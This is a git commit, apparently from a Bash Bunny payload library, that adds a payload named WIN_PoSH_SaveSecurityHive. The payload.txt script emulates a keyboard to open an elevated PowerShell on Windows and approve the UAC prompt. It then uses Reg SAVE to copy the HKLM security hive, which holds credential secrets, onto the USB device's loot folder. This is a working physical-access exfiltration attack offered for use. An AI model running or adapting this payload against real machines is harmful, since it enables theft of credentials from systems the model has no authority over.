Added new payload WIN_PoSH_HKU_RegBackUp (#424)

* Add files via upload * Update readme.md * Update payload.txt * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Add files via upload * Update readme.md * Update readme.md * Add Payload WIN_PoSH_HKU_RegBackUp * Update readme.md * Update payload.txt * Change for admin shell * Update readme.md * Update payload.txt * Update payload.txt * Update readme.md * Added payload WIN_PoSH_SaveSecurityHive Added new payload to exfiltration that saves the HKLM security hive to the bunny
2026-05-04 07:05:44 +01:00 · 2020-12-14 23:53:42 +00:00
parent b8a329232a
commit 3904f165d9
4 changed files with 101 additions and 0 deletions
--- a/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt
+++ b/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt
@@ -0,0 +1,22 @@
+# Title:       	Save security hive
+# Description:  Uses PowerShell, to run Reg.exe to save security hive to the bunny.  
+# Author:       Cribbit
+# Version:      1.0
+# Category:     Exfiltration
+# Target:       Windows 10 Creators Update (Powershell)
+# Attackmodes:  HID & STORAGE
+# Props:        Ben Clark (RTFM)	
+
+LED SETUP
+ATTACKMODE HID STORAGE
+
+LED ATTACK
+Q DELAY 200
+Q GUI x
+Q STRING a
+sleep 2
+Q ALT y
+sleep 2
+Q STRING "Reg SAVE HKLM\Security ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\'+\$env:computername+'_security.hive') /y"
+Q ENTER 
+LED FINISH